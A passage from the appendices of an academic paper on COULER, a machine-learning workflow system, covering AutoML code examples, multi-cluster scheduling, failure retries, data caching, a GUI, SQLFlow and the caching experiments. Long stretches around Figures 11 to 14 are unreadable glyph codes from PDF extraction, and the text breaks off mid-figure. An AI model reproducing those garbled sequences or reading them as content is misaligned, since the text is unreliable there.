zoo of C OULER , this job train a DL model based on the\ndifferent batch size from line 1 to 10, then run map function to\nstart multiple TensorFlow jobs in the same workflow from line\n13 to 33. Next, multiple evaluation steps are running based on\nthe outputs of previous model training results from line 25 to\n31.\nF . Example: Running an AutoML pipeline\n1def train_xgboost():\n2 train_data = Dataset(\n3 table_name=\"pai_telco_demo_data\",\n4 feature_cols=\"tenure,age,\n5 marital,address,ed,employ\",\n6 label_col=\"churn\",\n7 )\n8\n9 model_params = {\"objective\":\n10 \"binary:logistic\"}\n11 train_params = {\"num_boost_round\": 10,\n12 \"max_depth\": 5}\n13\n14 return xgboost.train(\n15 datasource=train_data,\n16 model_params=model_params,\n17 train_params=train_params,\n18 image=\"xgboost-image\",\n19 )\n20\n21def train_lgbm():\n22 train_data = Dataset(\n23 table_name=\"pai_telco_demo_data\",\n24 feature_cols=\"tenure,age,25 marital,address,ed,employ\",\n26 label_col=\"churn\",\n27 )\n28\n29 lgb = LightGBMEstimator()\n30 lgb.set_hyperparameters(num_leaves=63,\n31 num_iterations=200)\n32 lgb.model_path = \"lightgbm_model\"\n33 return lgb.fit(train_data)\n34\n35couler.concurrent([lambda: train_xgboost(),\n36 lambda: train_lgbm()])\nCode 7: An AutoML workflow in C OULER\nA more complex machine learning workflow application\nis the AutoML. Different from hyper-parameter tuning, data\nscientist prefers to select the best models from multiple model\ncandidates based on the same input data. This program 7\nshows how to choose a best model from two machine learning\nmodel (e.g., XGBoost [52] and LightGBM [21]), which are\nthe state-of-art tree and boost based machine learning model.\nThe training model in train xgboost ()andtrain lightbm ()\nis defined based on user’s from line 1 to line 33, then\ncouler.concurrent ()will run two jobs parallel in the same\nworkflow. Different from the way of couler.map (), Function\ncouler.concurrent ()start two training process based on dif-\nferent machine learning model.\nAPPENDIX B\nIMPLEMENTATION\nThe Python SDK for C OULER is now open-source, as\nshown in its public repository†. Several top enterprises have\nintegrated this SDK into their production environments. The\nwhole C OULER service is crafted in Golang, encompassing\nall internal components. Initially, the service might remain\nproprietary due to user onboarding challenges, but enhancing\nand ensuring the reusability of the optimization components\nis our priority. Thus, we are developing these components as\ncore libraries. Consequently, the service operates as a gRPC\nservice atop these libraries. In its open-source form, the Python\nSDK can utilize these libraries for extended capabilities.\nIt’s worth mentioning that C OULER is extensively used by\nAnt Group, managing over 20,000 workflows and 250,000\npods daily. Insights from our deployment experiences with the\nworkflow engine are discussed in subsequent sections.\nBeyond AntGroup, COULER is being used by a diverse\nset of organizations, as indicated in the list of adopters\navailable on Adopters of Couler [1]. These adopters span\ndifferent industries and use cases, suggesting that COULER is\nflexible and adaptable to various requirements and scenarios.\nMoreover, Argo’s endorsement of Couler [6] further supports\nCOULER’s suitability for different workloads and platforms.\nA. Workflow scheduling among clusters\nAt Ant Group, we have more than one clusters in differ-\nent locations. Workflows are scheduled among those clusters\n†https://couler-proj.github.io/couler/and each cluster has its specific configuration. For example,\nCluster A is specifically designed for GPU jobs, Cluster B is\nlocated far away from the storage cluster, Cluster C provides\nmore CPU capacity than others. In addition, the storage and\ncomputation capacity of a cluster is changing with respect the\ntime. We need to make sure each cluster owns the similar\ncomputation load. In this work, we provide a workflow queue\nto schedule the related steps of workflow into a corresponding\ncluster based on the following properties: (a) the workflow\npriority based on business logic, (b) cluster current capacity\nof CPU/Memory, (c) user’s current CPU/Memory quota, (d)\nuser’s current GPU quota. Then, a job is queued and pull out\nfrom the queue based on the weight combination of mentioned\nfactors. In this way, we can guarantee each cluster shares a\nsimilar capacity and avoid one cluster being overflow in the\nproduction.\nB. Monitor and failure handler\nIn order to reduce the unnecessary failure of workflow\nbelonging to the system environment (i.e., abnormal patterns\nof cloud), we adopt following polices to improve the stability:\n(a) workflow on-time monitor, (b) workflow controller auto\nretry, (c) provide options for users to restart from failure.\nInitially, we monitor workflow status and track the health\nstatus of the workflow engine. For example, we record the\nnumber of workflows based on their status, the latency for the\nworkflow operator to process a workflow, etc. This monitor\nmetric helps the SRE to respond to the abnormal behaviors of\nthe workflow at the first time.\nSubsequently, we get the patterns of system errors related\nworkflow. For example, “ExceededQuotaErr” means the Etcd\nof Kubernetes exceeded quota during the system is updat-\ning. “TooManyRequestsErr” means too many requests being\nhandled by API-server, usually happens under high pressure.\nThe backoff limit retry policy would help avoid DDOS of the\ncluster Etcd server. In general, we have found more than 20\nabnormal patterns to retry, then the workflow controller restarts\nthe failed step inside a workflow rather than from the begging\nautomatically.\nFurthermore, there are instances where users prefer to\nmanually retry some failed workflows, a scenario frequently\nencountered in machine learning. In such cases, data scientists\nupdate the relevant steps and wish to retry the workflow\nfrom the failure point instead of from the beginning. To\naddress this type of failure, C OULER ’s server first retrieves\nthe failed workflow from the database. Note that we persist\nworkflow metadata into a database for automated manage-\nment. The server then processes the failed workflow, skipping\nthe steps with “Succeeded,” “Skipped,” or “Cached” status.\nSubsequently, the server deletes the failed steps and the\nrelated CRDs and marks these steps as running. Finally, the\nworkflow’s status is updated to running, and it is restarted from\nthe failed step by the workflow operator.C. Caching input data for machine learning workflow\nIn a machine learning workflow, the input data for model\ntraining is stored in a data storage cluster, while the ma-\nchine learning job runs in a separate computation cluster.\nThis necessitates fetching data from remote storage before\ntraining, which is time-consuming and can lead to network IO\nfailures. This is particularly problematic for applications like\nads recommendation, where input tables often exceed 1TB,\nand for image and video deep learning models, which usually\ninvolve over a million files.\nAn analysis of production machine learning workflows at\nAnt Group, which include more than 5k models and 10k\nworkflows for applications such as ads recommendation, fault\ndetection, and video and image analysis, revealed that most\nworkflows read the same data multiple times. For instance,\n70% and 85% of the input data for tables and files, respec-\ntively, was read repeatedly. This redundancy arises due to\nseveral factors: (1) a single training job may need to scan\nthe entire dataset multiple epochs, (2) multiple training jobs\nmay need to read the same data to train the basic model, and\n(3) different training jobs may read overlapping data partitions\nusing a sliding time window.\nCurrently, users read input data via Python/Java clients\nin the Kubernetes pods of machine learning training jobs.\nHowever, the workflow engine, such as Argo Workflows,\ncannot track data flow because it operates on Kubernetes\nCustom Resource Definitions (CRD) and does not monitor\nthe runtime information of pods. This leads to two issues: (1)\nif a workflow fails, the training job must read the input data\nagain, and (2) if multiple training jobs in the same workflow\nread the same input data, each job reads the data remotely,\nleading to redundant data access and high network IO.\nTo address these issues, we propose a new Kubernetes CRD,\ncalled Dataset , to represent the input and output data of a\njob. The schema of Dataset is shown in Code 8. This CRD\nrecords the metadata of the data, enabling the workflow engine\nto understand the input and output of a training job and skip\nsteps to read cached data. Additionally, a caching server reads\ntheDataset status and syncs the data from the storage cluster\nto the computation cluster, eliminating the need for multiple\ndata synchronizations for different jobs.\n1apiVersion:\nio.kubemaker.alipay.com/v1alpha1\n2kind: Dataset\n3metadata:\n4 name: couler-cache-dataset\n5spec:\n6 owner: user_id\n7 odps:\n8 accessID:\n9 secretKeyRef:\n10 name: test-dataset-secret\n11 key: aid\n12 accessKey:\n13 secretKeyRef:\n14 name: test-dataset-secret\n15 key: akey16 project: test_project\n17 table: test_table\nCode 8: Dataset CRD in C OULER\nD. Interactive GUI\nIn addition to the programming API for defining workflows,\nwe also offer a GUI interface within a web portal. With\nthis approach, users can create workflows without any pro-\ngramming experience. Let’s consider Figure 9 as an example.\nUsers aim to identify the best model for predicting user\nchurn. Data scientists initially define data splitting methods\nfor training, select various well-known models (e.g., logistic\nregression, random forest, and XGBoost) for training the\nsame data, and ultimately choose the best model based on\nevaluation results. End-users only need to configure model-\nrelated parameters or data splitting methods. The backend then\ntranslates these actions into the workflow’s IR, as explained in\nSection II, which is subsequently sent to the server for further\noptimization.\nMeanwhile, machine learning algorithm developers can\nconstruct their own models and share them with others on\nthe same platform. This collection of well-known machine\nlearning algorithms is referred to as the ”model zoo.” A model\nzoo comprises model definitions and trained model parameters,\nessential for using the model in predictions and other analytical\ntasks. Notably, the backend of the model zoo corresponds to\nthe ”step zoo” of C OULER , as each model runs as one step in\na workflow. Therefore, the GUI and related actions align with\nCOULER ’s programming. Leveraging the interactive GUI, a\nsignificant portion of workflows (e.g., over 60%) in the cluster\nare executed via the GUI, addressing the rapid development\nneeds of machine learning applications.\nE. SQL and SQLFlow\nIn addition to the GUI and Python programming interface,\nSQLFlow [49] offers an SQL-like language to train machine\nlearning models and employ the trained models for predictions.\nCOULER serves as the default backend for SQLFlow [49].\nAll optimizations discussed in this work aim to enhance\nSQLFlow’s model training speed. Typically, a SQLFlow SQL\nstatement is converted into Couler programming code, which\nthen initiates a workflow in Kubernetes. An example can be\nseen in code B-E, where a DNNClassifier model is trained\nusing TensorFlow Estimators [8] on the sample data, Iris.train.\n1SELECT *\n2FROM iris.train\n3TO TRAIN DNNClassifier\n4WITH model.n_classes = 3,\n5model.hidden_units = [10]\n6COLUMN sepal_len, sepal_width,\n7 petal_length\n8LABEL class\n9INTO sqlflow_models.my_dnn_model;Fig. 9: GUI for the workflow\nBased on the trained model above, the user can submit a\nSQL query to get the validation data, then apply the trained\nmodel to make a prediction B-E over the selected data. The\noutput of SQL is the data with the prediction value. Naturally,\nusers also could start a data analysis job over the predicted\nresults based on SQL.\n1SELECT *\n2FROM iris.test\n3TO PREDICT iris.predict.class\n4USING sqlflow_models.my_dnn_model;\nAPPENDIX C\nRUNNING EXAMPLE OF NL TOUNIFIED PROGRAMMING\nINTERFACE\nWe illustrated an example in Figure 10, displaying the full\nautomated process of converting Natural Language to Unified\nProgramming Coded. The goal of this example is to choose\nthe optimal image classification model from ResNet, ViT,\nand DenseNet, by showcasing the transformation from natural\nlanguage descriptions to code generation.\nStep 1: Modular Decomposition\nInitially, we employed a chain-of-thought strategy to break\ndown the original natural language descriptions into smaller,\nmore concise task modules. For the given workflow descrip-\ntion: I need to design a workflow to select the optimal image\nclassification model... . Through this strategy, we identified the\nfollowing task modules: Data Loading, Model Application\n(ResNet, ViT, DenseNet), Model Training, Model Validation,\nModel Comparison, and Model Selection.\nStep 2: Code Generation\nStep 1: Modular Decomposition\nI have a natural language description of a computational\ntask. Can you help me decompose it into smaller , more\nconcise task modules? The description is: \nStep 2: Code Generation\nI have a concise task module, can you help me\ngenerate code for it? I can give you some reference\ncode:\nThe task is: \nCode_n :\nStep 3: Self-calibration\nI have generated some code for a specific task. Can\nyou evaluate it and provide a score between 0 and 1 to\nindicate its compliance with predefined templates and\nstandards? A score of 1 means the code fully complies\nwith the standards and templates, and a score of 0\nmeans it does not comply at all. The generated code is:\n[code_n]\nStep 4: User Feedback\nWhen users execute the generated workflow code, they\ncan submit feedback or suggest modifications to the\nLarge Language Model (LLM) should they encounter\nany bugs during the execution.I need to design a workflow to select the optimal image\nclassification model for images. I want to apply the\nResNet, V iT, and DenseNet models respectively . During\nthe model training phase, I will use the ......\nModel Training Module:\nTrain and validate each applied model using the same\ntraining data and validation data.Subtask in Chainsdef train_model(ResNet):\n command = f\"python train.py --model {model_name} --\ntrain_data <train_data> --validation_data <validation\n_data>\" \n return couler .run_container(\n image=\"training-image\",\n command=command.split(\" \"), )Chain-of-Thought\nReference \nCodeCode\nLibrarySimilarity\nsearchFig. 10: Running Example: NL to Unified Programming CodeFor each independent task module, we leveraged Large\nLanguage Models (LLMs) to generate code. Given each mod-\nule has a clear and singular task, this enhances the accuracy\nand reliability of the generated code. For instance, for the\nModel Training task, we generated the relevant code related\nto training models, ensuring all models use the same training\nand validation datasets.\nStep 3: Self-calibration\nSubsequently, we incorporated a self-calibration strategy to\noptimize the generated code. This strategy offers improvement\nsuggestions by comparing the generated code with predefined\ntemplates in terms of similarity, and these suggestions can be\nautomatically applied to refine the code further, ensuring its\ncompliance with C OULER norms and standards. For example,\nthe generated code for model training was compared and\noptimized against a predefined training code template as\nnecessary.\nStep 4: User Feedback\nFinally, users have the opportunity to review and validate\nthe generated C OULER code. If it does not meet users’ require-\nments, they can provide feedback and suggestions. The system\nwill utilize this feedback to optimize the generated code,\nenhancing the precision of code generation in future tasks.\nFor instance, if users find the model comparison methodology\nto be insufficient or biased, they can suggest modifications,\nallowing the system to adjust the code accordingly based on\nuser feedback.\nThrough these steps, we not only transformed natural lan-\nguage descriptions into executable code but also ensured the\nprecision, consistency, and efficiency of the generated code.\nThis enables users with limited programming experience to\neasily realize their computational tasks and workflow needs.\nAPPENDIX D\nCACHE STRATEGY AND CACHE SIZEABLATION\nEXPERIMENTS\nThis section showcases the comparative effects of the\nCOULER caching strategy against the FIFO and LRU caching\nstrategies. Additionally, this section displays the performance\nof the C OULER caching strategy under different cache sizes.\nThe following experimental graphs each show the differences\nin execution time and CPU/GPU utilization for various work-\nflow tasks under different conditions.\nA. Performance Study with Automatic Caching\nFIFO and LRU, as two efficient and universal caching\nstrategies, can effectively improve the cache hit rate and\nresource utilization efficiency during the caching process.\nThis paper compares the C OULER caching strategy with these\ntwo strategies, conducting tests in three scenarios: Image\nSegmentation, Language Model Fine-tuning, and Multimodal\nTraining. The results indicate that compared to the FIFO\nand LRU strategies, the C OULER caching strategy is more\nadaptable to the production environment of workflows. By\nconsidering artifact reconstruction cost, artifact reuse value,\nand artifact caching cost, C OULER achieves higher production\nefficiency.\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055(a) FIFO\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055 (b) LRU\nFig. 11: Effect of C OULER on Resource Utilization and\nWorkflow Execution Time in Image Segmentation Scenarios\nwith FIFO and LRU Strategies\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013 /uni00000015/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013 /uni00000015/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n(a) FIFO\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055 (b) LRU\nFig. 12: Effect of C OULER on Resource Utilization and\nWorkflow Execution Time in Language Model Fine-tuning\nScenarios with FIFO and LRU Strategies\nB. Performance Study with Cache Sizes\nCache size is a significant factor affecting caching effective-\nness, meaning that discussing the performance of the C OULER\ncaching strategy under more limited cache sizes is valuable.\nThis section details the changes in CPU/GPU utilization when\nthe cache size is set to 10G and 20G, compared to a more\nample 30G. It is observed that when the cache space is smaller,\nthe weight of the Artifact caching cost increases, and simul-\ntaneously, some artifact units no longer meet the conditions\nfor caching, leading to changes in caching situations, which\nin turn alters the workflow operation. When the cache size/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000029/uni0000002c/uni00000029/uni00000032\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055(a) FIFO\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055\n/uni00000013 /uni00000015/uni00000018 /uni00000018/uni00000013 /uni0000001a/uni00000018 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000015/uni00000018\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni0000002f/uni00000035/uni00000038\n/uni00000026/uni00000052/uni00000058/uni0000004f/uni00000048/uni00000055 (b) LRU\nFig. 13: Effect of C OULER on Resource Utilization and\nWorkflow Execution Time in Multimodal Training Scenarios\nwith FIFO and LRU Strategies\nis more limited, the effectiveness of C OULER decreases, but\noverall, satisfactory results are achieved.\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n(a) 10G and 30G\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000015/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a (b) 20G and 30G\nFig. 14: Effect of C OULER on Resource Utilization and Work-\nflow Execution Time with Different Cache Sizes in Image\nSegmentation Scenarios\nC. Performance study with Data caching\nWe study how the cache improves the data reading perfor-\nmance. At first, we use the two tables (e.g., ads-a and ads-b)\nfrom the ads recommendation application used in internal, the\ndata is partitioned and stored in the Alibaba ODPS [31] with\nan approximate size of bigger than 10GB per partition. We\nshow how the cache improves the data loading performance,\nas well as how the caching to improves the deep learning\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 /uni00000015/uni00000013/uni00000013\n/uni00000037/uni0000004c/uni00000050/uni00000048/uni00000013/uni00000011/uni00000013/uni00000013/uni00000011/uni00000015/uni00000013/uni00000011/uni00000017/uni00000013/uni00000011/uni00000019/uni00000013/uni00000011/uni0000001b/uni00000014/uni00000011/uni00000013/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028\n/uni0000002a/uni00000033/uni00000038/uni00000003/uni00000038/uni00000036/uni00000024/uni0000002a/uni00000028/uni00000003/uni00000032/uni00000059/uni00000048/uni00000055/uni00000003/uni00000037/uni0000004c/uni00000050/uni00000048\n/uni00000014/uni00000013/uni0000002a\n/uni00000016/uni00000013/uni0000002a(a) 10G and 30G\n/uni00000013 /uni00000018/uni00000013 /uni00000014/uni00000013/uni00000013 /uni00000014/uni00000018/uni00000013 